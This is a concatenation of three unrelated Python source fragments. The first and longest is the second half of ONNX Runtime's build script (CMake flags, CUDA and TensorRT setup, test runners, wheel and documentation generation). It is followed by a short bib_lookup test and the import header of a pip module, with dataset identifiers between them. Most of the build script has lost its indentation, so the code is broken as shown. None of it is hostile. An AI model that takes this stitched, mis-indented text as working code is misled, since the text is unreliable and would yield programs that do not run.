"-Donnxruntime_USE_CUDA=" + ("ON" if args.use_cuda else "OFF"),
"-Donnxruntime_USE_NSYNC=" + ("OFF" if is_windows() or not args.use_nsync else "ON"),
"-Donnxruntime_CUDNN_HOME=" + (cudnn_home if args.use_cuda else ""),
"-Donnxruntime_USE_AUTOML=" + ("ON" if args.use_automl else "OFF"),
"-Donnxruntime_CUDA_HOME=" + (cuda_home if args.use_cuda else ""),
"-Donnxruntime_USE_JEMALLOC=" + ("ON" if args.use_jemalloc else "OFF"),
"-Donnxruntime_ENABLE_PYTHON=" + ("ON" if args.enable_pybind else "OFF"),
"-Donnxruntime_BUILD_CSHARP=" + ("ON" if args.build_csharp else "OFF"),
"-Donnxruntime_BUILD_SHARED_LIB=" + ("ON" if args.build_shared_lib or args.build_server else "OFF"),
"-Donnxruntime_USE_EIGEN_FOR_BLAS=" + ("OFF" if args.use_openblas else "ON"),
"-Donnxruntime_USE_OPENBLAS=" + ("ON" if args.use_openblas else "OFF"),
"-Donnxruntime_USE_MKLDNN=" + ("ON" if args.use_mkldnn else "OFF"),
"-Donnxruntime_USE_MKLML=" + ("ON" if args.use_mklml else "OFF"),
"-Donnxruntime_USE_GEMMLOWP=" + ("ON" if args.use_gemmlowp else "OFF"),
"-Donnxruntime_USE_NGRAPH=" + ("ON" if args.use_ngraph else "OFF"),
"-Donnxruntime_USE_OPENVINO=" + ("ON" if args.use_openvino else "OFF"),
"-Donnxruntime_USE_OPENVINO_BINARY=" + ("ON" if args.use_openvino else "OFF"),
"-Donnxruntime_USE_OPENVINO_SOURCE=OFF",
"-Donnxruntime_USE_OPENVINO_MYRIAD=" + ("ON" if args.use_openvino == "MYRIAD_FP16" else "OFF"),
"-Donnxruntime_USE_OPENVINO_GPU_FP32=" + ("ON" if args.use_openvino == "GPU_FP32" else "OFF"),
"-Donnxruntime_USE_OPENVINO_GPU_FP16=" + ("ON" if args.use_openvino == "GPU_FP16" else "OFF"),
"-Donnxruntime_USE_OPENVINO_CPU_FP32=" + ("ON" if args.use_openvino == "CPU_FP32" else "OFF"),
"-Donnxruntime_USE_OPENVINO_VAD_M=" + ("ON" if args.use_openvino == "VAD-M_FP16" else "OFF"),
"-Donnxruntime_USE_NNAPI=" + ("ON" if args.use_dnnlibrary else "OFF"),
"-Donnxruntime_USE_OPENMP=" + ("ON" if args.use_openmp and not args.use_dnnlibrary and not args.use_mklml and not args.use_ngraph else "OFF"),
"-Donnxruntime_USE_TVM=" + ("ON" if args.use_tvm else "OFF"),
"-Donnxruntime_USE_LLVM=" + ("ON" if args.use_llvm else "OFF"),
"-Donnxruntime_ENABLE_MICROSOFT_INTERNAL=" + ("ON" if args.enable_msinternal else "OFF"),
"-Donnxruntime_USE_BRAINSLICE=" + ("ON" if args.use_brainslice else "OFF"),
"-Donnxruntime_USE_NUPHAR=" + ("ON" if args.use_nuphar else "OFF"),
"-Donnxruntime_USE_EIGEN_THREADPOOL=" + ("ON" if args.use_eigenthreadpool else "OFF"),
"-Donnxruntime_USE_TENSORRT=" + ("ON" if args.use_tensorrt else "OFF"),
"-Donnxruntime_TENSORRT_HOME=" + (tensorrt_home if args.use_tensorrt else ""),
# By default - we currently support only cross compiling for ARM/ARM64 (no native compilation supported through this script)
"-Donnxruntime_CROSS_COMPILING=" + ("ON" if args.arm64 or args.arm else "OFF"),
"-Donnxruntime_BUILD_SERVER=" + ("ON" if args.build_server else "OFF"),
"-Donnxruntime_BUILD_x86=" + ("ON" if args.x86 else "OFF"),
                  # nGraph and TensorRT providers currently only support the full_protobuf option.
"-Donnxruntime_USE_FULL_PROTOBUF=" + ("ON" if args.use_full_protobuf or args.use_ngraph or args.use_tensorrt or args.build_server or args.gen_doc else "OFF"),
"-Donnxruntime_DISABLE_CONTRIB_OPS=" + ("ON" if args.disable_contrib_ops else "OFF"),
"-Donnxruntime_MSVC_STATIC_RUNTIME=" + ("ON" if args.enable_msvc_static_runtime else "OFF"),
"-Donnxruntime_ENABLE_LANGUAGE_INTEROP_OPS=" + ("ON" if args.enable_language_interop_ops else "OFF"),
]
if args.use_brainslice:
bs_pkg_name = args.brain_slice_package_name.split('.', 1)
bs_shared_lib_name = '.'.join((bs_pkg_name[0], 'redist', bs_pkg_name[1]))
cmake_args += [
"-Donnxruntime_BRAINSLICE_LIB_PATH=%s/%s" % (args.brain_slice_package_path, args.brain_slice_package_name),
"-Donnxruntime_BS_CLIENT_PACKAGE=%s/%s" % (args.brain_slice_package_path, args.brain_slice_client_package_name),
"-Donnxruntime_BRAINSLICE_dynamic_lib_PATH=%s/%s" % (args.brain_slice_package_path, bs_shared_lib_name)]
if args.use_llvm:
cmake_args += ["-DLLVM_DIR=%s" % args.llvm_path]
if args.use_cuda and not is_windows():
nvml_stub_path = cuda_home + "/lib64/stubs"
cmake_args += ["-DCUDA_CUDA_LIBRARY=" + nvml_stub_path]
if args.use_preinstalled_eigen:
cmake_args += ["-Donnxruntime_USE_PREINSTALLED_EIGEN=ON",
"-Deigen_SOURCE_PATH=" + args.eigen_path]
if args.android:
cmake_args += ["-DCMAKE_TOOLCHAIN_FILE=" + args.android_ndk_path + "/build/cmake/android.toolchain.cmake",
"-DANDROID_PLATFORM=android-" + str(args.android_api),
"-DANDROID_ABI=" + str(args.android_abi)]
if path_to_protoc_exe:
cmake_args += ["-DONNX_CUSTOM_PROTOC_EXECUTABLE=%s" % path_to_protoc_exe]
if args.gen_doc:
cmake_args += ["-Donnxruntime_PYBIND_EXPORT_OPSCHEMA=ON"]
else:
cmake_args += ["-Donnxruntime_PYBIND_EXPORT_OPSCHEMA=OFF"]
cmake_args += ["-D{}".format(define) for define in cmake_extra_defines]
if is_windows():
cmake_args += cmake_extra_args
for config in configs:
config_build_dir = get_config_build_dir(build_dir, config)
os.makedirs(config_build_dir, exist_ok=True)
if args.use_tvm:
os.environ["PATH"] = os.path.join(config_build_dir, "external", "tvm", config) + os.pathsep + os.environ["PATH"]
run_subprocess(cmake_args + ["-DCMAKE_BUILD_TYPE={}".format(config)], cwd=config_build_dir)
def clean_targets(cmake_path, build_dir, configs):
for config in configs:
log.info("Cleaning targets for %s configuration", config)
build_dir2 = get_config_build_dir(build_dir, config)
cmd_args = [cmake_path,
"--build", build_dir2,
"--config", config,
"--target", "clean"]
run_subprocess(cmd_args)
def build_targets(cmake_path, build_dir, configs, parallel):
for config in configs:
log.info("Building targets for %s configuration", config)
build_dir2 = get_config_build_dir(build_dir, config)
cmd_args = [cmake_path,
"--build", build_dir2,
"--config", config]
build_tool_args = []
if parallel:
num_cores = str(multiprocessing.cpu_count())
if is_windows():
build_tool_args += ["/maxcpucount:" + num_cores]
else:
build_tool_args += ["-j" + num_cores]
if (build_tool_args):
cmd_args += [ "--" ]
cmd_args += build_tool_args
run_subprocess(cmd_args)
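# With --parallel on an 8-core Linux box this effectively runs, per config (illustrative):
#   cmake --build <build_dir>/Release --config Release -- -j8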
def add_dir_if_exists(dir, dir_list):
if (os.path.isdir(dir)):
dir_list.append(dir)
def setup_cuda_vars(args):
cuda_home = ""
cudnn_home = ""
if (args.use_cuda):
cuda_home = args.cuda_home if args.cuda_home else os.getenv("CUDA_HOME")
cudnn_home = args.cudnn_home if args.cudnn_home else os.getenv("CUDNN_HOME")
cuda_home_valid = (cuda_home != None and os.path.exists(cuda_home))
cudnn_home_valid = (cudnn_home != None and os.path.exists(cudnn_home))
if (not cuda_home_valid or not cudnn_home_valid):
raise BuildError("cuda_home and cudnn_home paths must be specified and valid.",
"cuda_home='{}' valid={}. cudnn_home='{}' valid={}"
.format(cuda_home, cuda_home_valid, cudnn_home, cudnn_home_valid))
if (is_windows()):
# Validate that the cudnn_home is pointing at the right level
if (not os.path.exists(os.path.join(cudnn_home, "bin"))):
raise BuildError("cudnn_home path should include the 'cuda' folder, and must contain the CUDNN 'bin' directory.",
"cudnn_home='{}'".format(cudnn_home))
os.environ["CUDA_PATH"] = cuda_home
os.environ["CUDA_TOOLKIT_ROOT_DIR"] = cuda_home
cuda_bin_path = os.path.join(cuda_home, 'bin')
os.environ["CUDA_BIN_PATH"] = cuda_bin_path
os.environ["PATH"] += os.pathsep + cuda_bin_path + os.pathsep + os.path.join(cudnn_home, 'bin')
# Add version specific CUDA_PATH_Vx_y value as the Visual Studio build files require that
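            # e.g. for CUDA 9.2 this sets CUDA_PATH_V9_2 to the cuda_home path
            # (the version is read from version.txt below).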
version_file = os.path.join(cuda_home, 'version.txt')
if not os.path.exists(version_file):
raise BuildError("No version file found in CUDA install directory. Looked for " + version_file)
cuda_major_version = "unknown"
with open(version_file) as f:
# First line of version file should have something like 'CUDA Version 9.2.148'
first_line = f.readline()
m = re.match("CUDA Version (\d+).(\d+)", first_line)
if not m:
raise BuildError("Couldn't read version from first line of " + version_file)
cuda_major_version = m.group(1)
minor = m.group(2)
os.environ["CUDA_PATH_V{}_{}".format(cuda_major_version, minor)] = cuda_home
vc_ver_str = os.getenv("VCToolsVersion") or ""
vc_ver = vc_ver_str.split(".")
if len(vc_ver) != 3:
log.warning("Unable to automatically verify VS 2017 toolset is compatible with CUDA. Will attempt to use.")
log.warning("Failed to get valid Visual C++ Tools version from VCToolsVersion environment variable value of '" + vc_ver_str + "'")
log.warning("VCToolsVersion is set in a VS 2017 Developer Command shell, or by running \"%VS2017INSTALLDIR%\\VC\\Auxiliary\\Build\\vcvars64.bat\"")
log.warning("See build.md in the root ONNXRuntime directory for instructions on installing the Visual C++ 2017 14.11 toolset if needed.")
elif cuda_major_version == "9" and vc_ver[0] == "14" and int(vc_ver[1]) > 11:
raise BuildError("Visual C++ Tools version not supported by CUDA v9. You must setup the environment to use the 14.11 toolset.",
"Current version is {}. CUDA 9.2 requires version 14.11.*".format(vc_ver_str),
"If necessary manually install the 14.11 toolset using the Visual Studio 2017 updater.",
"See 'Windows CUDA Build' in build.md in the root directory of this repository.")
# TODO: check if cuda_version >=10.1, when cuda is enabled and VS version >=2019
return cuda_home, cudnn_home
def setup_tensorrt_vars(args):
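    """Resolve and validate TENSORRT_HOME when --use_tensorrt is given and set the ORT_TENSORRT_* environment variables used by the tests."""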
tensorrt_home = ""
if (args.use_tensorrt):
tensorrt_home = args.tensorrt_home if args.tensorrt_home else os.getenv("TENSORRT_HOME")
        tensorrt_home_valid = (tensorrt_home is not None and os.path.exists(tensorrt_home))
        if (not tensorrt_home_valid):
            raise BuildError("tensorrt_home path must be specified and valid.",
                             "tensorrt_home='{}' valid={}."
                             .format(tensorrt_home, tensorrt_home_valid))
        # Set the maximum batch size for TensorRT. It must be at least as large as the biggest batch size used in any unit test
os.environ["ORT_TENSORRT_MAX_BATCH_SIZE"] = "13"
# Set maximum workspace size in byte for TensorRT (1GB = 1073741824 bytes)
os.environ["ORT_TENSORRT_MAX_WORKSPACE_SIZE"] = "1073741824"
# Set maximum number of iterations to detect unsupported nodes and partition the models for TensorRT
os.environ["ORT_TENSORRT_MAX_PARSER_ITERATIONS"] = "6"
return tensorrt_home
def adb_push(source_dir, src, dest, **kwargs):
return run_subprocess([os.path.join(source_dir, 'tools', 'ci_build', 'github', 'android', 'adb-push.sh'), src, dest], **kwargs)
def adb_shell(*args, **kwargs):
return run_subprocess(['adb', 'shell', *args], **kwargs)
def run_onnxruntime_tests(args, source_dir, ctest_path, build_dir, configs, enable_python_tests, enable_tvm = False, enable_tensorrt = False, enable_ngraph = False):
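    """Run the C++ unit tests (and optionally the Python tests) for every configuration; Android x86_64 builds run the tests inside an emulator instead."""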
for config in configs:
log.info("Running tests for %s configuration", config)
cwd = get_config_build_dir(build_dir, config)
android_x86_64 = args.android_abi == 'x86_64'
if android_x86_64:
run_subprocess(os.path.join(source_dir, 'tools', 'ci_build', 'github', 'android', 'start_android_emulator.sh'))
adb_push(source_dir, 'testdata', '/data/local/tmp/', cwd=cwd)
adb_push(source_dir, os.path.join(source_dir, 'cmake', 'external', 'onnx', 'onnx', 'backend', 'test'), '/data/local/tmp/', cwd=cwd)
adb_push(source_dir, 'onnxruntime_test_all', '/data/local/tmp/', cwd=cwd)
adb_push(source_dir, 'onnx_test_runner', '/data/local/tmp/', cwd=cwd)
adb_shell('cd /data/local/tmp && /data/local/tmp/onnxruntime_test_all')
if args.use_dnnlibrary:
adb_shell('cd /data/local/tmp && /data/local/tmp/onnx_test_runner -e nnapi /data/local/tmp/test')
else:
adb_shell('cd /data/local/tmp && /data/local/tmp/onnx_test_runner /data/local/tmp/test')
continue
if enable_tvm:
dll_path = os.path.join(build_dir, config, "external", "tvm", config)
elif enable_tensorrt:
dll_path = os.path.join(args.tensorrt_home, 'lib')
else:
dll_path = None
run_subprocess([ctest_path, "--build-config", config, "--verbose"],
cwd=cwd, dll_path=dll_path)
if enable_python_tests:
# Disable python tests for TensorRT because many tests are not supported yet
            if enable_tensorrt:
return
if is_windows():
cwd = os.path.join(cwd, config)
run_subprocess([sys.executable, 'onnxruntime_test_python.py'], cwd=cwd, dll_path=dll_path)
try:
import onnx
onnx_test = True
except ImportError:
warnings.warn("onnx is not installed. Following test cannot be run.")
onnx_test = False
if onnx_test:
run_subprocess([sys.executable, 'onnxruntime_test_python_backend.py'], cwd=cwd, dll_path=dll_path)
run_subprocess([sys.executable, os.path.join(source_dir,'onnxruntime','test','onnx','gen_test_models.py'),'--output_dir','test_models'], cwd=cwd)
run_subprocess([os.path.join(cwd,'onnx_test_runner'), 'test_models'], cwd=cwd)
if config != 'Debug':
run_subprocess([sys.executable, 'onnx_backend_test_series.py'], cwd=cwd, dll_path=dll_path)
if not args.skip_keras_test:
try:
import onnxmltools
import keras
onnxml_test = True
except ImportError:
warnings.warn("onnxmltools and keras are not installed. Following test cannot be run.")
onnxml_test = False
if onnxml_test:
run_subprocess([sys.executable, 'onnxruntime_test_python_keras.py'], cwd=cwd, dll_path=dll_path)
def run_onnx_tests(build_dir, configs, onnx_test_data_dir, provider, enable_parallel_executor_test, num_parallel_models):
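    """Run onnx_test_runner for every configuration against the ONNX backend test data and, for non-Debug builds, the downloaded model directories."""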
for config in configs:
cwd = get_config_build_dir(build_dir, config)
if is_windows():
exe = os.path.join(cwd, config, 'onnx_test_runner')
model_dir = os.path.join(cwd, "models")
else:
exe = os.path.join(cwd, 'onnx_test_runner')
model_dir = os.path.join(build_dir, "models")
cmd = []
        if provider:
            cmd += ["-e", provider]
            if provider in ('mkldnn', 'openvino', 'nuphar'):
                cmd += ['-c', '1']
if num_parallel_models > 0:
cmd += ["-j", str(num_parallel_models)]
if config != 'Debug' and os.path.exists(model_dir):
if provider == 'tensorrt':
model_dir = os.path.join(model_dir, "opset8")
cmd.append(model_dir)
if os.path.exists(onnx_test_data_dir):
cmd.append(onnx_test_data_dir)
if config == 'Debug' and provider == 'nuphar':
return
run_subprocess([exe] + cmd, cwd=cwd)
if enable_parallel_executor_test:
run_subprocess([exe,'-x'] + cmd, cwd=cwd)
# mkldnn temporary function for running onnx tests and model tests separately.
def mkldnn_run_onnx_tests(build_dir, configs, onnx_test_data_dir):
for config in configs:
cwd = get_config_build_dir(build_dir, config)
if is_windows():
exe = os.path.join(cwd, config, 'onnx_test_runner')
model_dir = os.path.join(cwd, "models")
else:
exe = os.path.join(cwd, 'onnx_test_runner')
model_dir = os.path.join(build_dir, "models")
cmd_base = ['-e', 'mkldnn', '-c', '1', '-j', '1']
if os.path.exists(onnx_test_data_dir):
onnxdata_cmd = cmd_base + [onnx_test_data_dir]
# /data/onnx
run_subprocess([exe] + onnxdata_cmd, cwd=cwd)
run_subprocess([exe,'-x'] + onnxdata_cmd, cwd=cwd)
# models/opset7, models/opset8, models/opset9
if config != 'Debug' and os.path.exists(model_dir):
opset7_model_dir = os.path.join(model_dir, 'opset7')
opset7_cmd = cmd_base + [opset7_model_dir]
opset8_model_dir = os.path.join(model_dir, 'opset8')
opset8_cmd = cmd_base + [opset8_model_dir]
opset9_model_dir = os.path.join(model_dir, 'opset9')
opset9_cmd = cmd_base + [opset9_model_dir]
run_subprocess([exe] + opset7_cmd, cwd=cwd)
run_subprocess([exe, '-x'] + opset7_cmd, cwd=cwd)
run_subprocess([exe] + opset8_cmd, cwd=cwd)
run_subprocess([exe, '-x'] + opset8_cmd, cwd=cwd)
run_subprocess([exe] + opset9_cmd, cwd=cwd)
run_subprocess([exe, '-x'] + opset9_cmd, cwd=cwd)
# nuphar temporary function for running python tests separately as it requires ONNX 1.5.0
def nuphar_run_python_tests(build_dir, configs, azure_sas_key):
for config in configs:
if config == 'Debug':
continue
cwd = get_config_build_dir(build_dir, config)
if is_windows():
cwd = os.path.join(cwd, config)
dll_path = os.path.join(build_dir, config, "external", "tvm", config)
# install onnx for shape inference in testing Nuphar scripts
# this needs to happen after onnx_test_data preparation which uses onnx 1.3.0
run_subprocess([sys.executable, '-m', 'pip', 'install', '--user', 'onnx==1.5.0'])
run_subprocess([sys.executable, 'onnxruntime_test_python_nuphar.py'], cwd=cwd, dll_path=dll_path)
def split_server_binary_and_symbol(build_dir, configs):
if is_windows():
# TODO: Windows support
pass
else:
for config in configs:
if config == 'RelWithDebInfo':
config_build_dir = get_config_build_dir(build_dir, config)
run_subprocess(['objcopy', '--only-keep-debug', 'onnxruntime_server', 'onnxruntime_server.symbol'], cwd=config_build_dir)
run_subprocess(['strip', '--strip-debug', '--strip-unneeded', 'onnxruntime_server'], cwd=config_build_dir)
run_subprocess(['objcopy', '--add-gnu-debuglink=onnxruntime_server.symbol', 'onnxruntime_server'], cwd=config_build_dir)
libonnx = glob.glob(os.path.join(config_build_dir, "libonnxruntime.so.*"))
                    if len(libonnx) != 1:
                        raise ValueError("Expected exactly one libonnxruntime.so.* in {}, found {}".format(config_build_dir, len(libonnx)))
libonnx = libonnx[0]
run_subprocess(['objcopy', '--only-keep-debug', libonnx, libonnx+'.symbol'], cwd=config_build_dir)
run_subprocess(['strip', '--strip-debug', libonnx], cwd=config_build_dir)
run_subprocess(['objcopy', '--add-gnu-debuglink={}.symbol'.format(libonnx), libonnx], cwd=config_build_dir)
def run_server_tests(build_dir, configs):
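    """Ensure the Python packages needed by the server tests are installed, then run test_main.py against the built onnxruntime_server for every configuration."""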
pip_freeze_result = run_subprocess([sys.executable, '-m', 'pip', 'freeze'], capture=True).stdout
installed_packages = [r.decode().split('==')[0] for r in pip_freeze_result.split()]
    if not all(pkg in installed_packages for pkg in ('requests', 'protobuf', 'numpy', 'grpcio')):
if hasattr(sys, 'real_prefix'):
# In virtualenv
run_subprocess([sys.executable, '-m', 'pip', 'install', '--trusted-host', 'files.pythonhosted.org', 'requests', 'protobuf', 'numpy', 'grpcio'])
else:
# Outside virtualenv
run_subprocess([sys.executable, '-m', 'pip', 'install', '--user', '--trusted-host', 'files.pythonhosted.org', 'requests', 'protobuf', 'numpy', 'grpcio'])
for config in configs:
config_build_dir = get_config_build_dir(build_dir, config)
if is_windows():
server_app_path = os.path.join(config_build_dir, config, 'onnxruntime_server.exe')
python_package_path = os.path.join(config_build_dir, config)
else:
server_app_path = os.path.join(config_build_dir, 'onnxruntime_server')
python_package_path = config_build_dir
server_test_folder = os.path.join(config_build_dir, 'server_test')
server_test_data_folder = os.path.join(os.path.join(config_build_dir, 'testdata'), 'server')
run_subprocess([sys.executable, 'test_main.py', server_app_path, server_test_data_folder, server_test_data_folder, python_package_path, server_test_folder], cwd=server_test_folder, dll_path=None)
def run_server_model_tests(build_dir, configs):
for config in configs:
config_build_dir = get_config_build_dir(build_dir, config)
server_test_folder = os.path.join(config_build_dir, 'server_test')
server_test_data_folder = os.path.join(config_build_dir, 'server_test_data')
if is_windows():
server_app_path = os.path.join(config_build_dir, config, 'onnxruntime_server.exe')
test_raw_data_folder = os.path.join(config_build_dir, 'models')
python_package_path = os.path.join(config_build_dir, config)
else:
server_app_path = os.path.join(config_build_dir, 'onnxruntime_server')
test_raw_data_folder = os.path.join(build_dir, 'models')
python_package_path = config_build_dir
run_subprocess([sys.executable, 'model_zoo_data_prep.py', test_raw_data_folder, server_test_data_folder, python_package_path, server_test_folder], cwd=server_test_folder, dll_path=None)
run_subprocess([sys.executable, 'model_zoo_tests.py', server_app_path, test_raw_data_folder, server_test_data_folder, python_package_path, server_test_folder], cwd=server_test_folder, dll_path=None)
def build_python_wheel(source_dir, build_dir, configs, use_cuda, use_ngraph, use_tensorrt, use_openvino, use_nuphar, nightly_build = False):
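    """Run 'setup.py bdist_wheel' for every configuration, forwarding the flags that select the execution provider baked into the wheel."""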
for config in configs:
cwd = get_config_build_dir(build_dir, config)
if is_windows():
cwd = os.path.join(cwd, config)
args = [sys.executable, os.path.join(source_dir, 'setup.py'), 'bdist_wheel']
if nightly_build:
args.append('--nightly_build')
if use_tensorrt:
args.append('--use_tensorrt')
elif use_cuda:
args.append('--use_cuda')
elif use_ngraph:
args.append('--use_ngraph')
elif use_openvino:
args.append('--use_openvino')
elif use_nuphar:
args.append('--use_nuphar')
run_subprocess(args, cwd=cwd)
def build_protoc_for_host(cmake_path, source_dir, build_dir, args):
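    """Build a native protoc in <build_dir>/host_protoc so that cross-compiled builds can run protobuf code generation on the host; returns the path to the built executable."""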
    if (args.arm or args.arm64) and not is_windows():
        raise BuildError('Building protoc for the host is currently only supported on Windows when cross-compiling for ARM/ARM64')
log.info("Building protoc for host to be used in cross-compiled build process")
protoc_build_dir = os.path.join(os.getcwd(), build_dir, 'host_protoc')
os.makedirs(protoc_build_dir, exist_ok=True)
# Generate step
cmd_args = [cmake_path,
os.path.join(source_dir, 'cmake', 'external', 'protobuf', 'cmake'),
'-Dprotobuf_BUILD_TESTS=OFF',
'-Dprotobuf_WITH_ZLIB_DEFAULT=OFF',
'-Dprotobuf_BUILD_SHARED_LIBS=OFF']
if is_windows():
cmd_args += ['-T',
'host=x64',
'-G',
args.cmake_generator]
run_subprocess(cmd_args, cwd= protoc_build_dir)
# Build step
cmd_args = [cmake_path,
"--build", protoc_build_dir,
"--config", "Release",
"--target", "protoc"]
run_subprocess(cmd_args)
# Absolute protoc path is needed for cmake
expected_protoc_path = os.path.join(protoc_build_dir, 'Release', 'protoc.exe') if is_windows() else os.path.join(protoc_build_dir, 'protoc')
if not os.path.exists(expected_protoc_path):
raise BuildError("Couldn't build protoc for host. Failing build.")
return expected_protoc_path
def generate_documentation(source_dir, build_dir, configs):
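    """Regenerate ContribOperators.md and OperatorKernels.md using the freshly built Python module and compare them against the checked-in copies via 'git diff'."""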
operator_doc_path = os.path.join(source_dir, 'docs', 'ContribOperators.md')
opkernel_doc_path = os.path.join(source_dir, 'docs', 'OperatorKernels.md')
for config in configs:
#copy the gen_doc.py
shutil.copy(os.path.join(source_dir,'tools','python','gen_doc.py'),
os.path.join(build_dir,config, config))
shutil.copy(os.path.join(source_dir,'tools','python','gen_opkernel_doc.py'),
os.path.join(build_dir,config, config))
run_subprocess([
sys.executable,
'gen_doc.py',
'--output_path', operator_doc_path
],
cwd = os.path.join(build_dir,config, config))
run_subprocess([
sys.executable,
'gen_opkernel_doc.py',
'--output_path', opkernel_doc_path
],
cwd = os.path.join(build_dir,config, config))
docdiff = ''
try:
docdiff = subprocess.check_output(['git', 'diff', opkernel_doc_path])
except subprocess.CalledProcessError:
print('git diff returned non-zero error code')
if len(docdiff) > 0:
            # Show a warning instead of raising an exception, because the generated content depends on which execution providers were enabled in this build
            log.warning('The updated opkernel document file ' + str(opkernel_doc_path) + ' is different from the checked-in version. Consider regenerating the file with the CPU, MKLDNN and CUDA providers enabled.')
log.debug('diff:\n'+str(docdiff))
docdiff = ''
try:
docdiff = subprocess.check_output(['git', 'diff', operator_doc_path])
except subprocess.CalledProcessError:
print('git diff returned non-zero error code')
if len(docdiff) > 0:
raise BuildError('The updated operator document file '+str(operator_doc_path)+' must be checked in.\n diff:\n'+str(docdiff))
def main():
args = parse_arguments()
cmake_extra_defines = args.cmake_extra_defines if args.cmake_extra_defines else []
cross_compiling = args.arm or args.arm64 or args.android
# if there was no explicit argument saying what to do, default to update, build and test (for native builds).
    if not (args.update or args.clean or args.build or args.test):
log.debug("Defaulting to running update, build [and test for native builds].")
args.update = True
args.build = True
if cross_compiling:
args.test = args.android_abi == 'x86_64'
else:
args.test = True
if args.use_tensorrt:
args.use_cuda = True
if args.build_wheel or args.enable_server_model_tests:
args.enable_pybind = True
if args.build_csharp:
args.build_shared_lib = True
configs = set(args.config)
# setup paths and directories
cmake_path = resolve_executable_path(args.cmake_path)
ctest_path = resolve_executable_path(args.ctest_path)
build_dir = args.build_dir
script_dir = os.path.realpath(os.path.dirname(__file__))
source_dir = os.path.normpath(os.path.join(script_dir, "..", ".."))
# if using cuda, setup cuda paths and env vars
cuda_home, cudnn_home = setup_cuda_vars(args)
# if using tensorrt, setup tensorrt paths
tensorrt_home = setup_tensorrt_vars(args)
os.makedirs(build_dir, exist_ok=True)
log.info("Build started")
if (args.update):
cmake_extra_args = []
path_to_protoc_exe = None
        if is_windows():
if (args.x86):
cmake_extra_args = ['-A','Win32','-T','host=x64','-G', args.cmake_generator]
elif (args.arm or args.arm64):
# Cross-compiling for ARM(64) architecture
# First build protoc for host to use during cross-compilation
path_to_protoc_exe = build_protoc_for_host(cmake_path, source_dir, build_dir, args)
if args.arm:
cmake_extra_args = ['-A', 'ARM']
else:
cmake_extra_args = ['-A', 'ARM64']
cmake_extra_args += ['-G', args.cmake_generator]
# Cannot test on host build machine for cross-compiled builds (Override any user-defined behaviour for test if any)
if args.test:
log.info("Cannot test on host build machine for cross-compiled ARM(64) builds. Will skip test running after build.")
args.test = False
else:
toolset = 'host=x64'
if (args.msvc_toolset):
toolset += ',version=' + args.msvc_toolset
if (args.cuda_version):
toolset += ',cuda=' + args.cuda_version
cmake_extra_args = ['-A','x64','-T', toolset, '-G', args.cmake_generator]
if args.android:
# Cross-compiling for Android
path_to_protoc_exe = build_protoc_for_host(cmake_path, source_dir, build_dir, args)
if is_ubuntu_1604():
if (args.arm or args.arm64):
raise BuildError("Only Windows ARM(64) cross-compiled builds supported currently through this script")
install_ubuntu_deps(args)
if not is_docker():
install_python_deps()
if (args.enable_pybind and is_windows()):
install_python_deps(args.numpy_version)
if (not args.skip_submodule_sync):
update_submodules(source_dir)
if args.enable_onnx_tests or args.download_test_data:
if args.download_test_data:
if not args.test_data_url or not args.test_data_checksum:
raise UsageError("The test_data_url and test_data_checksum arguments are required.")
setup_test_data(build_dir, configs, args.test_data_url, args.test_data_checksum, args.azure_sas_key)
if args.path_to_protoc_exe:
path_to_protoc_exe = args.path_to_protoc_exe
generate_build_tree(cmake_path, source_dir, build_dir, cuda_home, cudnn_home, tensorrt_home, path_to_protoc_exe, configs, cmake_extra_defines,
args, cmake_extra_args)
if (args.clean):
clean_targets(cmake_path, build_dir, configs)
if (args.build):
build_targets(cmake_path, build_dir, configs, args.parallel)
    if args.test:
run_onnxruntime_tests(args, source_dir, ctest_path, build_dir, configs,
args.enable_pybind and not args.skip_onnx_tests,
args.use_tvm, args.use_tensorrt, args.use_ngraph)
# run the onnx model tests if requested explicitly.
if args.enable_onnx_tests and not args.skip_onnx_tests:
# directory from ONNX submodule with ONNX test data
onnx_test_data_dir = '/data/onnx'
if is_windows() or not os.path.exists(onnx_test_data_dir):
onnx_test_data_dir = os.path.join(source_dir, "cmake", "external", "onnx", "onnx", "backend", "test", "data")
if args.use_tensorrt:
                # Disable some onnx unit tests that the TensorRT parser doesn't support yet
                onnx_test_data_dir = os.path.join(source_dir, "cmake", "external", "onnx", "onnx", "backend", "test", "data", "simple")
run_onnx_tests(build_dir, configs, onnx_test_data_dir, 'tensorrt', False, 1)
elif args.use_cuda:
run_onnx_tests(build_dir, configs, onnx_test_data_dir, 'cuda', False, 2)
elif args.x86 or platform.system() == 'Darwin':
run_onnx_tests(build_dir, configs, onnx_test_data_dir, None, False, 1)
elif args.use_ngraph:
run_onnx_tests(build_dir, configs, onnx_test_data_dir, 'ngraph', True, 1)
elif args.use_openvino:
run_onnx_tests(build_dir, configs, onnx_test_data_dir, 'openvino', False, 1)
# TODO: parallel executor test fails on MacOS
elif args.use_nuphar:
run_onnx_tests(build_dir, configs, onnx_test_data_dir, 'nuphar', False, 1)
else:
run_onnx_tests(build_dir, configs, onnx_test_data_dir, None, True, 0)
if args.use_mkldnn:
mkldnn_run_onnx_tests(build_dir, configs, onnx_test_data_dir)
# run nuphar python tests last, as it installs ONNX 1.5.0
if args.enable_pybind and not args.skip_onnx_tests and args.use_nuphar:
nuphar_run_python_tests(build_dir, configs, args.azure_sas_key)
if args.build_server:
split_server_binary_and_symbol(build_dir, configs)
if args.enable_server_tests:
run_server_tests(build_dir, configs)
if args.enable_server_model_tests:
run_server_model_tests(build_dir, configs)
if args.build:
if args.build_wheel:
nightly_build = bool(os.getenv('NIGHTLY_BUILD') == '1')
build_python_wheel(source_dir, build_dir, configs, args.use_cuda, args.use_ngraph, args.use_tensorrt, args.use_openvino, args.use_nuphar, nightly_build)
if args.gen_doc and (args.build or args.test):
generate_documentation(source_dir, build_dir, configs)
log.info("Build complete")
if __name__ == "__main__":
try:
sys.exit(main())
except BaseError as e:
log.error(str(e))
sys.exit(1)
|
the-stack_106_12945
|
from pathlib import Path
try:
import bib_lookup
except ModuleNotFoundError:
import sys
sys.path.insert(0, str(Path(__file__).parent.parent.resolve()))
import bib_lookup
_CWD = Path(__file__).absolute().parent
_INPUT_FILE = _CWD / "invalid_items.bib"
def test_checking():
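    """The sample invalid_items.bib is expected to contain malformed entries starting at lines 3, 16 and 45."""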
bl = bib_lookup.BibLookup()
err_lines = bl.check_bib_file(_INPUT_FILE)
assert err_lines == [3, 16, 45]
if __name__ == "__main__":
test_checking()
|
the-stack_106_12948
|
from __future__ import absolute_import
import logging
import os
import re
import shutil
import sys
import sysconfig
import traceback
import warnings
import zipfile
from distutils.util import change_root
from email.parser import FeedParser # type: ignore
from pip._vendor import pkg_resources, pytoml, six
from pip._vendor.packaging import specifiers
